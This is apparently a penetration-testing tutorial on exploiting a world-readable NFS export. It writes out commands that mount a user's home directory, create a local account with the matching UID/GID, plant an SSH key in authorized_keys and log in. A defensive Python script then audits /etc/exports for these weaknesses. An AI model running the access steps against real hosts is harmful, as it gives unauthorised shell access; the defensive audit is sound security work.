How To Find NFS Mounted Drives (Penetration Testing)

How do you find hidden NFS drives when doing penetration testing on a target box?

The idea here is to find the drives mounted on the target box and exploit them. Once we know the name of the target directory, we can view its UID and GID information, create a user with the same ID on our machine, and mount the home directory of the target machine on ours.

Once we have done that, we can copy our SSH keys to the mounted directory and log in with our credentials.

You can use the following commands:

showmount -e 192.168.1.4
Export list for 192.168.1.4:
/home/frank *

root@kali:~# mkdir frank
root@kali:~# mount -t nfs 192.168.1.4:/home/frank ~/frank

root@kali:~# ls frank
ls: cannot open directory ‘frank’: Permission denied

root@kali:~# ls -ld frank
drwxr-x--- 4 nobody 4294967294 4096 Apr 5 15:16 frank
root@kali:~# stat frank
File: ‘frank’
Size: 4096 Blocks: 8 IO Block: 32768 directory
Device: 30h/48d Inode: 32917 Links: 4
Access: (0750/drwxr-x---) Uid: (65534/ nobody) Gid: (4294967294/ UNKNOWN)

root@kali:~# mount -t nfs -o vers=3 192.168.1.4:/home/frank ~/frank
root@kali:~# ls -ld frank
drwxr-x--- 4 2008 2008 4096 Apr 5 15:16 frank

root@kali:~# groupadd --gid 2008 frank_group
root@kali:~# useradd --uid 2008 --groups frank_group frank

At this point we are done adding a new user to our machine. Now we can copy our SSH keys and log in to it:

root@kali:~# mkdir frank/.ssh
root@kali:~# cp ~/.ssh/id_rsa.pub frank/.ssh/authorized_keys

root@kali:~# ssh frank@192.168.1.4
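
Seen from the server side, the steps above work because the export is offered to every host (`*`) and NFS's default AUTH_SYS security believes whatever UID/GID the client sends; `root_squash` only remaps UID 0. The following is an added example, not part of the original post: a small Python audit of `/etc/exports` content that flags such entries. The sample export lines and the issue names are constructed for illustration.

```python
# Constructed /etc/exports content for the demo; not taken from the host in the post.
SAMPLE_EXPORTS = """\
/home/frank  *(rw,sync,root_squash)
/srv/build   192.168.1.0/24(rw,sync,all_squash,anonuid=65534,anongid=65534)
/srv/docs    *(ro,sync)
/home/alice  client1.example.internal(rw,sync,sec=krb5p)
"""


def parse_exports(text):
    """Yield (path, client, options) per client entry.

    Simplified exports(5) parsing: no quoted paths, line continuations
    or leading "-default,options" groups.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs or ["*"]:          # no client listed means any host
            client, _, opts = spec.partition("(")
            yield path, client or "*", set(opts.rstrip(")").split(",")) - {""}


def audit(text):
    """Return {(path, client): [issues]} for exports open to the UID-matching trick."""
    report = {}
    for path, client, opts in parse_exports(text):
        # sec= may list several flavors separated by ':'; the default is sys (AUTH_SYS).
        flavors = next((o[4:].split(":") for o in opts if o.startswith("sec=")), ["sys"])
        issues = []
        if client == "*":
            issues.append("any-host")            # every host that can reach the server may mount
        if "sys" in flavors and "all_squash" not in opts:
            issues.append("client-uid-trusted")  # server believes the UID/GID the client sends
            if "rw" in opts:
                issues.append("writable")        # e.g. .ssh/authorized_keys can be created remotely
        if "no_root_squash" in opts:
            issues.append("no_root_squash")      # remote root keeps UID 0
        if issues:
            report[(path, client)] = issues
    return report


if __name__ == "__main__":
    for (path, client), issues in audit(SAMPLE_EXPORTS).items():
        print(f"{path} -> {client}: {', '.join(issues)}")
```

Restricting the client list, adding `all_squash`, or requiring a `sec=krb5*` flavor clears the corresponding finding.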
